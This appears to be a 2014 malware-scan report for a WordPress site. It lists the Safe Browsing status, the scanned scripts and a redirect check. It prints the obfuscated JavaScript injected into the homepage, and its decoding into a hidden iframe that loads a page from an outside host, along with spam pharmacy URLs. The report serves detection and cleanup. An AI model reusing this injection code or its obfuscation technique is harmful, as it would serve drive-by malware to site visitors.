Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tofigrasulov.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tofigrasulov.com/ | 200 OK Content-Length: 302062 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('%')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['write'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%e200%o221%o220%i204%p226%o227%e200%t221%o221%.144%i227%/147%v233%w241%p158%c202%i168%486% 134%r211%m210%b209%r214%e215%=95%082% 147%t237%l209%=95%w224%d216%h162%0107% 136%e206%g207%t174%082%"96%<107%i207%r211%m210%>62'));
Decoded script:
<iframe src="http://economicprotection.biz/dvswzp.cgi?4" frameborder="0" style="width:0; height:0""></iframe>
Antivirus reports:
http://tofigrasulov.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 10263 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1791 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/themes/scylla-lite/js/scylla.js?ver=3.8.1 | 200 OK Content-Length: 1273 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/themes/scylla-lite/js/other.js?ver=3.8.1 | 200 OK Content-Length: 17049 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/themes/scylla-lite/js/easyslider.js?ver=3.8.1 | 200 OK Content-Length: 6202 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/themes/scylla-lite/js/fancybox.js?ver=3.8.1 | 200 OK Content-Length: 15724 Content-Type: application/javascript | clean |
http://tofigrasulov.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js | 200 OK Content-Length: 994 Content-Type: application/javascript | clean |
http://tofigrasulov.com/?feed=rss2 | 200 OK Content-Length: 16588 Content-Type: text/xml | clean |
http://tofigrasulov.com/'http://1buycheapcialisonline.com/' | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
http://tofigrasulov.com/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
http://tofigrasulov.com/'http://buycialisonlinenowe.com/' | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tofigrasulov.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Sep 2014 03:52:23 GMT
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=az; expires=Tue, 23-Sep-2014 03:52:22 GMT; path=/
X-Pingback: http://tofigrasulov.com/xmlrpc.php
X-Powered-By: PHP/5.4.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: tofigrasulov.com
Referer: http://www.google.com/search?q=tofigrasulov.com
Result:
The result is similar to the first query. No suspicious redirects were found.